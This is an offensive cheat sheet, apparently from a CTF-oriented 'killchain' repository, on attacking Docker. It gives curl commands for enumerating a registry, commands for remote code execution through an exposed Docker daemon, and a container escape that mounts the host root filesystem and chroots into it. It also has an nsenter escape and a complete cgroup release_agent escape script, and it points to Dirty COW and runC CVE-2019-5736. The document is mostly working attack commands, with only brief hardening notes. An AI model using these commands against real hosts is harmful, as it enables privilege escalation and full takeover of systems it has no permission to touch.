whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/misc/level3_hypervisor/docker_sec/docker.md

3.1 KiB
Raw Blame History

Docker Vulnerabilities

Abusing Registry

  • Registry Doc
  • Registry is a json API endpoint
  • Private registry added in /etc/docker/daemon.json
  • Can be found by nmap as a service

Enumeration

  • General query
curl http://test.com:5000/v2/_catalog`
  • List tags
curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
  • history section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>

Reversing Docker Images

dive <IMAGE-ID>

Uploading Images to Registry

  • Ever image has a latest tag
  • Upload modified docker image as latest
  • Article

RCE via Exposed Docker Daemon

  • Users inside the docker group may open tcp socket through docker

  • nmap -sV -p- <IP> -vv to find exposed tcp sockets via docker

  • Confirming via curl http://test.com:2375/version on open docker port

  • Execute commands on socket

    docker -H tcp://test.com:2375 ps
docker -H tcp://test.com:2375 exec <container> <cmd>

  • root please

Escape Container via Exposed Docker Daemon

  • Looking for exposed docker sockets
find / -name "*sock"
groups
  • Mount the host volume and chroot to it, need alpine image.
docker images
```sh
```sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

or

docker run -v /:/host --rm -it <imageID> chroot /host/ bash

Shared Namespaces

  • Namespaces

  • Cgroups

  • OverlayFS

  • Requires root inside the container

  • Execute command

nsenter --target 1 --mount sh

Misconfiguration

  • Privileged container connect to the host directly, not through the docker engine
  • Execution of bins on the host from libs inside the container is possible
capsh --print

  • man capabilities

  • PoC

  • Exploit

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Dirty c0w

https://github.com/dirtycow/dirtycow.github.io

runC

CVE-2019-5736

Securing a Container

  • Least Privileges
  • Seccomp
  • Securing Registry via TLS

Checking if you are inside a container

  • Low process count
ps aux
  • .dockerenv in /
cd / && ls -lah
  • cgroups contain docker names
pwd /proc/1
cat cgroups